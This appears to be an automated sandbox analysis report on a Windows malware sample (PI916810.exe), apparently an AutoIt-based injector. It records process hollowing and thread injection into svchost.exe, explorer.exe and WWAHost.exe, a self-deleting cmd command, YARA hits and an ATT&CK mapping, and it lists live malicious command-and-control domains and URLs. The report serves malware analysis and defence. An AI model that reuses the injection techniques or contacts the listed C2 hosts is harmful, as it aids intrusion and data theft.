          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039309AD mov eax, dword ptr fs:[00000030h]2_2_039309AD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039309AD mov eax, dword ptr fs:[00000030h]2_2_039309AD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039649D0 mov eax, dword ptr fs:[00000030h]2_2_039649D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FA9D3 mov eax, dword ptr fs:[00000030h]2_2_039FA9D3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C69C0 mov eax, dword ptr fs:[00000030h]2_2_039C69C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039629F9 mov eax, dword ptr fs:[00000030h]2_2_039629F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039629F9 mov eax, dword ptr fs:[00000030h]2_2_039629F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BE9E0 mov eax, dword ptr fs:[00000030h]2_2_039BE9E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BC912 mov eax, dword ptr fs:[00000030h]2_2_039BC912
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928918 mov eax, dword ptr fs:[00000030h]2_2_03928918
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928918 mov eax, dword ptr fs:[00000030h]2_2_03928918
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE908 mov eax, dword ptr fs:[00000030h]2_2_039AE908
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE908 mov eax, dword ptr fs:[00000030h]2_2_039AE908
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B892A mov eax, dword ptr fs:[00000030h]2_2_039B892A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C892B mov eax, dword ptr fs:[00000030h]2_2_039C892B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B0946 mov eax, dword ptr fs:[00000030h]2_2_039B0946
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04940 mov eax, dword ptr fs:[00000030h]2_2_03A04940
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D4978 mov eax, dword ptr fs:[00000030h]2_2_039D4978
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D4978 mov eax, dword ptr fs:[00000030h]2_2_039D4978
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BC97C mov eax, dword ptr fs:[00000030h]2_2_039BC97C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03956962 mov eax, dword ptr fs:[00000030h]2_2_03956962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03956962 mov eax, dword ptr fs:[00000030h]2_2_03956962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03956962 mov eax, dword ptr fs:[00000030h]2_2_03956962
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0397096E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0397096E mov edx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0397096E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039BC89D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03930887 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0395E8C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A008C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396C8F9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396C8F9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FA8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039BC810 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03952835 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03952835 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03952835 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_004B81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
          Source: C:\Windows\SysWOW64\svchost.exe | Process token adjusted: Debug
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_0048A364 SetUnhandledExceptionFilter
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_0048A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\explorer.exe | Network Connect: 199.59.243.227 80
          Source: C:\Users\user\Desktop\PI916810.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\WWAHost.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\WWAHost.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\svchost.exe | Thread register set: target process: 1028
          Source: C:\Windows\SysWOW64\WWAHost.exe | Thread register set: target process: 1028
          Source: C:\Windows\SysWOW64\svchost.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Windows\SysWOW64\svchost.exe | Section unmapped: C:\Windows\SysWOW64\WWAHost.exe base address: 260000
          Source: C:\Users\user\Desktop\PI916810.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2EED008
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_004B8C93 LogonUserW
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_00463B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_00464A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_004C4EC9 mouse_event
          Source: C:\Users\user\Desktop\PI916810.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PI916810.exe"
          Source: C:\Windows\SysWOW64\WWAHost.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_004B81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_004C4C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid
          Source: PI916810.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
          Source: explorer.exe, 00000003.00000002.4494090893.0000000009C22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3095216810.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2422259396.0000000009B8A000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd=
          Source: explorer.exe, 00000003.00000002.4487289171.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.2045268213.0000000001731000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
          Source: PI916810.exe, explorer.exe, 00000003.00000002.4487289171.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.2045268213.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.4489300977.0000000004B00000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000002.4487289171.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.2045268213.0000000001731000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
          Source: explorer.exe, 00000003.00000002.4487289171.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.2045268213.0000000001731000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
          Source: explorer.exe, 00000003.00000000.2044763297.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4486573997.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PProgman
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_0048886B cpuid
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_004950D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_004A2230 GetUserNameW
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_0049418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_00464AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo

          Stealing of Sensitive Information

          Source: Yara match | File source: 0.2.PI916810.exe.1a00000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.PI916810.exe.1a00000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000004.00000002.4486857852.0000000002800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.2090686862.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.4486904859.0000000002830000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.4486513656.0000000000210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.2091243380.0000000003840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.2091165777.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.2042338339.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: PI916810.exe | Binary or memory string: WIN_81
          Source: PI916810.exe | Binary or memory string: WIN_XP
          Source: PI916810.exe | Binary or memory string: WIN_XPe
          Source: PI916810.exe | Binary or memory string: WIN_VISTA
          Source: PI916810.exe | Binary or memory string: WIN_7
          Source: PI916810.exe | Binary or memory string: WIN_8
          Source: PI916810.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 4USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

          Remote Access Functionality

          Source: Yara match | File source: 0.2.PI916810.exe.1a00000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.PI916810.exe.1a00000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000004.00000002.4486857852.0000000002800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.2090686862.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.4486904859.0000000002830000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.4486513656.0000000000210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.2091243380.0000000003840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.2091165777.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.2042338339.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_004D6596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_004D6A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket
          MITRE ATT&CK Matrix

          Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
          Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 2 Native API | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 1 Credential API Hooking | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
          Credentials | Domains | Default Accounts | 1 Shared Modules | 2 Valid Accounts | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Credential API Hooking | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
          Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 2 Valid Accounts | 2 Obfuscated Files or Information | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 21 Input Capture | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
          Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 21 Access Token Manipulation | 1 DLL Side-Loading | NTDS | 215 System Information Discovery | Distributed Component Object Model | 3 Clipboard Data | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
          Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 612 Process Injection | 1 Rootkit | LSA Secrets | 251 Security Software Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
          Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Valid Accounts | Cached Domain Credentials | 2 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
          DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 2 Virtualization/Sandbox Evasion | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
          Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Access Token Manipulation | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
          Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 612 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
          Behavior Graph (ID: 1548156, Sample: PI916810.exe, Startdate: 04/11/2024, Architecture: WINDOWS, Score: 100)

          Sample-level DNS/IP: www.ool-covers76.xyz, www.lray-civil.xyz, 10 other IPs or domains (www.lray-civil.xyz: Performs DNS queries to domains with low reputation)
          Sample-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 8 other signatures
          PI916810.exe (started) - signatures: Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces
            -> svchost.exe (started) - signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; 3 other signatures
              -> explorer.exe (injected) - DNS/IP: 94950.bodis.com 199.59.243.227, 49796, 80, BODIS-NJUS United States; signature: System process connects to network (likely due to code injection or exploit)
                -> WWAHost.exe (started) - signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements; Switches to a custom stack to bypass stack traces
                  -> cmd.exe (started)
                    -> conhost.exe (started)

          Source | Detection | Scanner | Label | Link
          PI916810.exe | 29% | ReversingLabs | Win32.Trojan.AutoitInject |
          PI916810.exe | 100% | Joe Sandbox ML | |
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          Source | Detection | Scanner | Label | Link
          https://powerpoint.office.comcember | 0% | URL Reputation | safe |
          https://excel.office.com | 0% | URL Reputation | safe |
          http://schemas.micro | 0% | URL Reputation | safe |
          https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe | 0% | URL Reputation | safe |
          https://outlook.com | 0% | URL Reputation | safe |
          https://android.notify.windows.com/iOS | 0% | URL Reputation | safe |
          https://api.msn.com/ | 0% | URL Reputation | safe |
          http://crl.v | 0% | URL Reputation | safe |
          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          94950.bodis.com | 199.59.243.227 | true | true | | unknown
          www.elonix-traceglow.pro | unknown | unknown | true | | unknown
          www.ithin-ksvodn.xyz | unknown | unknown | true | | unknown
          www.lray-civil.xyz | unknown | unknown | true | | unknown
          www.azl.pro | unknown | unknown | true | | unknown
          www.g18q11a.top | unknown | unknown | true | | unknown
          www.9net88.net | unknown | unknown | true | | unknown
          www.eloshost.xyz | unknown | unknown | true | | unknown
          www.lasterdeals.shop | unknown | unknown | true | | unknown
          www.ool-covers76.xyz | unknown | unknown | true | | unknown
          www.ridesmaidgiftsboutiqueki.shop | unknown | unknown | true | | unknown
          www.rowadservepros.net | unknown | unknown | true | | unknown
          Name | Malicious | Antivirus Detection | Reputation
          www.9net88.net/ge07/ | true | | unknown
          http://www.9net88.net/ge07/?O2MHn=rInKjcO63u4K1THTAINFv2coOl+G9i0Xo3vzod/XDYjf3VmyXg5Nkxs22uvGPLor/dpE&uVuD=ApWHHF | true | | unknown
                                                                                                      unknown
                                                                                                      https://wns.windows.com/)sexplorer.exe, 00000003.00000000.2048880486.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4492745414.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        unknown
                                                                                                        http://www.lray-civil.xyzexplorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000003.00000000.2052141439.000000000C81C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2052141439.000000000C860000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            unknown
                                                                                                            http://www.ridesmaidgiftsboutiqueki.shop/ge07/www.elonix-traceglow.proexplorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              unknown
                                                                                                              http://www.g18q11a.topexplorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                unknown
                                                                                                                http://www.ool-covers76.xyz/ge07/www.azl.proexplorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  unknown
                                                                                                                  http://www.giyztm.xyz/ge07/www.ridesmaidgiftsboutiqueki.shopexplorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    unknown
                                                                                                                    http://www.elonix-traceglow.pro/ge07/www.yegle.netexplorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      unknown
                                                                                                                      http://www.eloshost.xyz/ge07/explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        unknown
                                                                                                                        http://www.wner-nyquh.xyzReferer:explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          unknown
                                                                                                                          http://www.lray-civil.xyzReferer:explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            http://www.wner-nyquh.xyz/ge07/www.ood-packaging-jobs-brasil.todayexplorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                              unknown
                                                                                                                              http://www.azl.pro/ge07/explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                unknown
                                                                                                                                http://www.lray-civil.xyz/ge07/explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                  unknown
                                                                                                                                  https://outlook.comexplorer.exe, 00000003.00000003.3094383643.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2422259396.0000000009B8A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4494158240.0000000009C96000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2048880486.0000000009B41000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  http://www.ood-packaging-jobs-brasil.todayReferer:explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                    unknown
                                                                                                                                    http://www.g18q11a.top/ge07/explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                      unknown
                                                                                                                                      http://www.ithin-ksvodn.xyzexplorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                        unknown
                                                                                                                                        http://www.lasterdeals.shopexplorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                          unknown
                                                                                                                                          http://www.ridesmaidgiftsboutiqueki.shop/ge07/explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                            unknown
                                                                                                                                            http://www.rowadservepros.net/ge07/www.giyztm.xyzexplorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                              unknown
                                                                                                                                              http://www.ithin-ksvodn.xyzReferer:explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                unknown
                                                                                                                                                http://www.9net88.netexplorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  http://www.rowadservepros.netReferer:explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                    unknown
